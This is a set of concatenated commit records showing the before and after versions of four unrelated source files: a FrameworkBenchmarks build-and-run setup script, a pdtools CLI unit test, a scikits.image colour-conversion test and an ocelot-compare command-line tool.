nchmarks,dmacd/FB-try1,zane-techempower/FrameworkBenchmarks,doom369/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,sgml/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,actframework/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,actframework/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,zloster/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,doom369/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,khellang/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,doom369/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,khellang/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,valyala/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,grob/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,Verber/FrameworkBenchmarks,herloct/FrameworkBenchmarks,methane/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,valyala/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,torhve/FrameworkBenchmarks,testn/FrameworkBenchmarks,grob/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,doom369/FrameworkBenchmarks,testn/FrameworkBenchmarks,zloster/FrameworkBenchmarks,sgml/FrameworkBenchmarks,dmacd/FB-try1,MTDdk/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,methane/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,doom369/FrameworkBenchmarks,sxend/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,sxend/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,testn/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,leafo/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,joshk/FrameworkBenchmarks,Verber/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,zapov/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,dmacd/FB-try1,sagenschneider/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,zapov/FrameworkBenchmarks,actframework/FrameworkBenchmarks,dmacd/FB-try1,mfirry/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,torhve/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,sgml/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,Verber/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,dmacd/FB-try1,sxend/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,zloster/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,herloct/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,herloct/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,khellang/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,sxend/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,valyala/FrameworkBenchmarks,Verber/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,zloster/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,jamming/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,methane/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,leafo/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,psfblair/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,herloct/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,victorbriz/FrameworkBenchmarks,zapov/FrameworkBenchmarks,methane/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,denkab/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,actframework/FrameworkBenchmarks,leafo/FrameworkBenchmarks,jamming/FrameworkBenchmarks,sgml/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,actframework/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,zapov/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,grob/FrameworkBenchmarks,diablonhn/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,actframework/FrameworkBenchmarks,methane/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,denkab/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,thousandsofthem/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,herloct/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,alubbe/FrameworkBenchmarks,sgml/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,zloster/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,methane/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,valyala/FrameworkBenchmarks,Eyepea/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,marko-asplund/FrameworkBenchmarks,jamming/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,khellang/FrameworkBenchmarks,denkab/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,herloct/FrameworkBenchmarks,lcp0578/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,jamming/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,methane/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,zloster/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,valyala/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,Synchro/FrameworkBenchmarks,knewmanTE/FrameworkBenchmarks,herloct/FrameworkBenchmarks,khellang/FrameworkBenchmarks,valyala/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,hperadin/FrameworkBenchmarks,sgml/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,leafo/FrameworkBenchmarks,F3Community/FrameworkBenchmarks,dmacd/FB-try1,jetty-project/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,sanjoydesk/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,RockinRoel/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,herloct/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,martin-g/FrameworkBenchmarks,leafo/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,nkasvosve/FrameworkBenchmarks,joshk/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,jaguililla/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,Verber/FrameworkBenchmarks,markkolich/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,sxend/FrameworkBenchmarks,torhve/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,dmacd/FB-try1,PermeAgility/FrameworkBenchmarks,sgml/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,circlespainter/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,zapov/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,doom369/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,kellabyte/FrameworkBenchmarks,fabianmurariu/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,sxend/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,s-ludwig/FrameworkBenchmarks,kbrock/FrameworkBenchmarks,ashawnbandy-te-tfb/FrameworkBenchmarks,nbrady-techempower/FrameworkBenchmarks,ratpack/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,k-r-g/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,mfirry/FrameworkBenchmarks,MTDdk/FrameworkBenchmarks,zdanek/FrameworkBenchmarks,grob/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,joshk/FrameworkBenchmarks,greg-hellings/FrameworkBenchmarks,youprofit/FrameworkBenchmarks,joshk/FrameworkBenchmarks,raziel057/FrameworkBenchmarks,Jesterovskiy/FrameworkBenchmarks,sagenschneider/FrameworkBenchmarks,zapov/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,Rayne/FrameworkBenchmarks,greenlaw110/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,jeevatkm/FrameworkBenchmarks,grob/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,PermeAgility/FrameworkBenchmarks,steveklabnik/FrameworkBenchmarks,donovanmuller/FrameworkBenchmarks,zapov/FrameworkBenchmarks,stefanocasazza/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,zhuochenKIDD/FrameworkBenchmarks,khellang/FrameworkBenchmarks,actframework/FrameworkBenchmarks,kostya-sh/FrameworkBenchmarks,sxend/FrameworkBenchmarks,jebbstewart/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,zane-techempower/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,hamiltont/FrameworkBenchmarks,yunspace/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,dmacd/FB-try1,mfirry/FrameworkBenchmarks,saturday06/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,sxend/FrameworkBenchmarks,jetty-project/FrameworkBenchmarks,Rydgel/FrameworkBenchmarks,nathana1/FrameworkBenchmarks,seem-sky/FrameworkBenchmarks,doom369/FrameworkBenchmarks,Ocramius/FrameworkBenchmarks,doom369/FrameworkBenchmarks,xitrum-framework/FrameworkBenchmarks,actframework/FrameworkBenchmarks,Dith3r/FrameworkBenchmarks,zapov/FrameworkBenchmarks,zapov/FrameworkBenchmarks,waiteb3/FrameworkBenchmarks | plain/setup.py | plain/setup.py | import setup_util
import subprocess
import sys
import time
import os
def start(args, logfile, errfile):
setup_util.replace_text("plain/src/main/resources/application.conf", "127.0.0.1", args.database_host)
if os.name == 'nt':
subprocess.check_call(".\sbt.bat assembly && del /f /s /q target\scala-2.10\cache", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
else:
subprocess.check_call("./sbt assembly && rm -rf target/scala-2.10/cache", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
subprocess.Popen("java -server -da -dsa -Xrs -Xmx6g -Xmn4g -Xss8m -Xnoclassgc -XX:MaxPermSize=1g -XX:ReservedCodeCacheSize=384m -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -jar target/scala-2.10/plain-benchmark-assembly-1.0.1.jar", cwd="plain", shell=True, stderr=errfile, stdout=logfile)
time.sleep(10)
return 0
def stop(logfile, errfile):
if os.name == 'nt':
subprocess.call("taskkill /f /im *plain-benchmark* > NUL", shell=True, stderr=errfile, stdout=logfile)
else:
p = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)
out, err = p.communicate()
for line in out.splitlines():
if 'plain-benchmark' in line:
try:
pid = int(line.split(None, 2)[1])
os.kill(pid, 15)
except OSError:
return 1
# Takes up so much disk space
if os.name == 'nt':
subprocess.check_call("del /f /s /q target && del /f /s /q project", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
else:
subprocess.check_call("rm -rf target && rm -rf project/.ivy && rm -rf project/.boot", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
return 0
| import setup_util
import subprocess
import sys
import time
import os
def start(args, logfile, errfile):
setup_util.replace_text("plain/src/main/resources/application.conf", "127.0.0.1", args.database_host)
if os.name == 'nt':
subprocess.check_call(".\sbt.bat assembly && del /f /s /q target\scala-2.10\cache", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
else:
subprocess.check_call("./sbt assembly && rm -rf target/scala-2.10/cache", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
subprocess.Popen("java -server -da -dsa -Xrs -Xmx6g -Xmn4g -Xss8m -Xnoclassgc -XX:MaxPermSize=1g -XX:ReservedCodeCacheSize=384m -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -jar target/scala-2.10/plain-benchmark-assembly-1.0.1.jar", cwd="plain", shell=True, stderr=errfile, stdout=logfile)
time.sleep(10)
return 0
def stop(logfile, errfile):
if os.name == 'nt':
subprocess.call("taskkill /f /im *plain-benchmark* > NUL", shell=True, stderr=errfile, stdout=logfile)
else:
p = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)
out, err = p.communicate()
for line in out.splitlines():
if 'plain-benchmark' in line:
try:
pid = int(line.split(None, 2)[1])
os.kill(pid, 15)
except OSError:
return 1
# Takes up so much disk space
if os.name == 'nt':
subprocess.check_call("del /f /s /q target && del /f /s /q project", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
else:
subprocess.check_call("rm -rf target && rm -rf project", shell=True, cwd="plain", stderr=errfile, stdout=logfile)
return 0
| bsd-3-clause | Python |
8c1ec4a8dc35b38a15c000a6eb6ccb046f51d44a | Fix unit tests for export-configuration and generate-configuration. | ParadropLabs/Paradrop,ParadropLabs/Paradrop,ParadropLabs/Paradrop | tests/pdtools/test_node.py | tests/pdtools/test_node.py | import click
from click.testing import CliRunner
from mock import patch, MagicMock
from pdtools import node
@patch("pdtools.util.open_yaml_editor")
@patch("pdtools.node.util.format_result")
@patch("pdtools.node.ParadropClient")
def test_simple_node_commands(ParadropClient, format_result, open_yaml_editor):
commands = [
["create-user", "test@example.com"],
["describe-audio"],
["describe-chute", "test"],
["describe-chute-cache", "test"],
["describe-chute-configuration", "test"],
["describe-chute-network-client", "test", "wifi", "00:11:22:33:44:55"],
["describe-pdconf"],
["describe-provision"],
["export-configuration"],
["generate-configuration"],
["help"],
["import-ssh-key", "/dev/null"],
["list-audio-modules"],
["list-audio-sinks"],
["list-audio-sources"],
["list-chute-network-clients", "test", "wifi"],
["list-chute-networks", "test"],
["list-chutes"],
["list-snap-interfaces"],
["list-ssh-keys"],
["load-audio-module", "module-test"],
["login"],
["logout"],
["remove-chute-network-client", "test", "wifi", "00:11:22:33:44:55"],
["set-sink-volume", "default", "0"],
["set-source-volume", "default", "0"],
["trigger-pdconf"]
]
client = MagicMock()
client.generate_config.return_value = {}
client.get_config.return_value = {}
ParadropClient.return_value = client
format_result.return_value = "result"
open_yaml_editor.return_value = "", True
runner = CliRunner()
for command in commands:
result = runner.invoke(node.root, command, obj={})
print("Command {} exit code {}".format(command[0], result.exit_code))
if result.exception is not None:
print(result.exception)
assert result.exit_code == 0
| import click
from click.testing import CliRunner
from mock import patch
from pdtools import node
@patch("pdtools.util.open_yaml_editor")
@patch("pdtools.node.util.format_result")
@patch("pdtools.node.ParadropClient")
def test_simple_node_commands(ParadropClient, format_result, open_yaml_editor):
commands = [
["create-user", "test@example.com"],
["describe-audio"],
["describe-chute", "test"],
["describe-chute-cache", "test"],
["describe-chute-configuration", "test"],
["describe-chute-network-client", "test", "wifi", "00:11:22:33:44:55"],
["describe-pdconf"],
["describe-provision"],
["export-configuration"],
["generate-configuration"],
["help"],
["import-ssh-key", "/dev/null"],
["list-audio-modules"],
["list-audio-sinks"],
["list-audio-sources"],
["list-chute-network-clients", "test", "wifi"],
["list-chute-networks", "test"],
["list-chutes"],
["list-snap-interfaces"],
["list-ssh-keys"],
["load-audio-module", "module-test"],
["login"],
["logout"],
["remove-chute-network-client", "test", "wifi", "00:11:22:33:44:55"],
["set-sink-volume", "default", "0"],
["set-source-volume", "default", "0"],
["trigger-pdconf"]
]
format_result.return_value = "result"
open_yaml_editor.return_value = "", True
runner = CliRunner()
for command in commands:
result = runner.invoke(node.root, command, obj={})
print("Command {} exit code {}".format(command[0], result.exit_code))
assert result.exit_code == 0
| apache-2.0 | Python |
032d0cd785a979da59e90c1064a868cd252618e4 | Change import to form used everywhere else. | bsipocz/scikit-image,ClinicalGraphics/scikit-image,rjeli/scikit-image,almarklein/scikit-image,emmanuelle/scikits.image,blink1073/scikit-image,rjeli/scikit-image,chriscrosscutler/scikit-image,almarklein/scikit-image,emmanuelle/scikits.image,emon10005/scikit-image,WarrenWeckesser/scikits-image,paalge/scikit-image,almarklein/scikit-image,GaelVaroquaux/scikits.image,paalge/scikit-image,robintw/scikit-image,Midafi/scikit-image,paalge/scikit-image,SamHames/scikit-image,michaelpacer/scikit-image,chintak/scikit-image,pratapvardhan/scikit-image,Britefury/scikit-image,ajaybhat/scikit-image,GaelVaroquaux/scikits.image,ofgulban/scikit-image,dpshelio/scikit-image,newville/scikit-image,emon10005/scikit-image,pratapvardhan/scikit-image,robintw/scikit-image,jwiggins/scikit-image,SamHames/scikit-image,ClinicalGraphics/scikit-image,almarklein/scikit-image,ofgulban/scikit-image,chriscrosscutler/scikit-image,dpshelio/scikit-image,bennlich/scikit-image,chintak/scikit-image,blink1073/scikit-image,Midafi/scikit-image,oew1v07/scikit-image,warmspringwinds/scikit-image,emmanuelle/scikits.image,youprofit/scikit-image,ajaybhat/scikit-image,juliusbierk/scikit-image,juliusbierk/scikit-image,newville/scikit-image,emmanuelle/scikits.image,bsipocz/scikit-image,jwiggins/scikit-image,vighneshbirodkar/scikit-image,michaelaye/scikit-image,vighneshbirodkar/scikit-image,keflavich/scikit-image,oew1v07/scikit-image,WarrenWeckesser/scikits-image,Britefury/scikit-image,SamHames/scikit-image,rjeli/scikit-image,bennlich/scikit-image,ofgulban/scikit-image,michaelpacer/scikit-image,chintak/scikit-image,warmspringwinds/scikit-image,youprofit/scikit-image,keflavich/scikit-image,GaZ3ll3/scikit-image,vighneshbirodkar/scikit-image,Hiyorimi/scikit-image,Hiyorimi/scikit-image,chintak/scikit-image,GaZ3ll3/scikit-image,SamHames/scikit-image,michaelaye/scikit-image | scikits/image/color/tests/test_colorconv.py | scikits/image/color/tests/test_colorconv.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:author: Nicolas Pinto, 2009
:license: modified BSD
"""
import os.path
import numpy as np
from numpy.testing import *
from scikits.image.io import imread
from scikits.image.color import (
rgb2hsv,
)
from scikits.image import data_dir
import colorsys
class TestColorconv(TestCase):
img_rgb = imread(os.path.join(data_dir, 'color.png'))
img_grayscale = imread(os.path.join(data_dir, 'camera.png'))
def test_rgb2hsv_conversion(self):
rgb = self.img_rgb.astype("float32")[::16, ::16]
hsv = rgb2hsv(rgb).reshape(-1, 3)
# ground truth from colorsys
gt = np.array([colorsys.rgb_to_hsv(pt[0], pt[1], pt[2])
for pt in rgb.reshape(-1, 3)]
)
assert_almost_equal(hsv, gt)
def test_rgb2hsv_error_grayscale(self):
self.assertRaises(ValueError, rgb2hsv, self.img_grayscale)
def test_rgb2hsv_error_one_element(self):
self.assertRaises(ValueError, rgb2hsv, self.img_rgb[0,0])
def test_rgb2hsv_error_list(self):
self.assertRaises(TypeError, rgb2hsv, [self.img_rgb[0,0]])
if __name__ == "__main__":
run_module_suite()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:author: Nicolas Pinto, 2009
:license: modified BSD
"""
from os import path
import numpy as np
from numpy.testing import *
from scikits.image.io import imread
from scikits.image.color import (
rgb2hsv,
)
from scikits.image import data_dir
import colorsys
class TestColorconv(TestCase):
img_rgb = imread(path.join(data_dir, 'color.png'))
img_grayscale = imread(path.join(data_dir, 'camera.png'))
def test_rgb2hsv_conversion(self):
rgb = self.img_rgb.astype("float32")[::16, ::16]
hsv = rgb2hsv(rgb).reshape(-1, 3)
# ground truth from colorsys
gt = np.array([colorsys.rgb_to_hsv(pt[0], pt[1], pt[2])
for pt in rgb.reshape(-1, 3)]
)
assert_almost_equal(hsv, gt)
def test_rgb2hsv_error_grayscale(self):
self.assertRaises(ValueError, rgb2hsv, self.img_grayscale)
def test_rgb2hsv_error_one_element(self):
self.assertRaises(ValueError, rgb2hsv, self.img_rgb[0,0])
def test_rgb2hsv_error_list(self):
self.assertRaises(TypeError, rgb2hsv, [self.img_rgb[0,0]])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | Python |
822ff043c755a731d5f12181071f3ce0d1a7b2a2 | Adjust name of CLI utility | OcelotProject/Compare,OcelotProject/Compare,OcelotProject/Compare | ocelot_compare/bin/cli.py | ocelot_compare/bin/cli.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Ocelot-compare CLI interface.
Usage:
ocelot-compare compare <run_id> <ref_dirpath> [--debug]
ocelot-compare show <run_id> [--debug]
Options:
--list List the updates needed, but don't do anything
-h --help Show this screen.
--version Show version.
"""
from docopt import docopt
from ocelot_compare import cache
from ocelot_compare.comparison import prepare_loaded_data
from ocelot_compare.filesystem import (
load_model_run,
load_cached_datasets,
create_reference_result,
)
from ocelot_compare.webapp import app
import threading
import webbrowser
def run_flask_app(host="127.0.0.1", port="5000", debug=False, loc='compare'):
url = "http://{}:{}/{}".format(host, port, loc)
threading.Timer(1., lambda: webbrowser.open_new_tab(url)).start()
app.run(
debug=debug,
host=host,
port=int(port)
)
def main():
try:
args = docopt(__doc__, version='Ocelot comparison interface 0.1')
if not cache.run:
print("Loading results")
cache.run_id = args['<run_id>']
cache.run = load_model_run(cache.run_id)
if args['compare']:
try:
cache.given = load_cached_datasets(args['<ref_dirpath>'])
except AssertionError:
create_reference_result(args['<ref_dirpath>'])
cache.given = load_cached_datasets(args['<ref_dirpath>'])
prepare_loaded_data()
if args['compare']:
loc = 'compare'
elif args['show']:
loc = 'show'
run_flask_app(loc=loc, debug=args['--debug'])
except KeyboardInterrupt:
print("Terminating Ocelot comparison interface")
sys.exit(1)
if __name__ == "__main__":
main()
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Ocelot-compare CLI interface.
Usage:
compare-cli compare <run_id> <ref_dirpath> [--debug]
compare-cli show <run_id> [--debug]
Options:
--list List the updates needed, but don't do anything
-h --help Show this screen.
--version Show version.
"""
from docopt import docopt
from ocelot_compare import cache
from ocelot_compare.comparison import prepare_loaded_data
from ocelot_compare.filesystem import (
load_model_run,
load_cached_datasets,
create_reference_result,
)
from ocelot_compare.webapp import app
import threading
import webbrowser
def run_flask_app(host="127.0.0.1", port="5000", debug=False, loc='compare'):
url = "http://{}:{}/{}".format(host, port, loc)
threading.Timer(1., lambda: webbrowser.open_new_tab(url)).start()
app.run(
debug=debug,
host=host,
port=int(port)
)
def main():
try:
args = docopt(__doc__, version='Ocelot comparison interface 0.1')
if not cache.run:
print("Loading results")
cache.run_id = args['<run_id>']
cache.run = load_model_run(cache.run_id)
if args['compare']:
try:
cache.given = load_cached_datasets(args['<ref_dirpath>'])
except AssertionError:
create_reference_result(args['<ref_dirpath>'])
cache.given = load_cached_datasets(args['<ref_dirpath>'])
prepare_loaded_data()
if args['compare']:
loc = 'compare'
elif args['show']:
loc = 'show'
run_flask_app(loc=loc, debug=args['--debug'])
except KeyboardInterrupt:
print("Terminating Ocelot comparison interface")
sys.exit(1)
if __name__ == "__main__":
main()
| bsd-3-clause | Python |
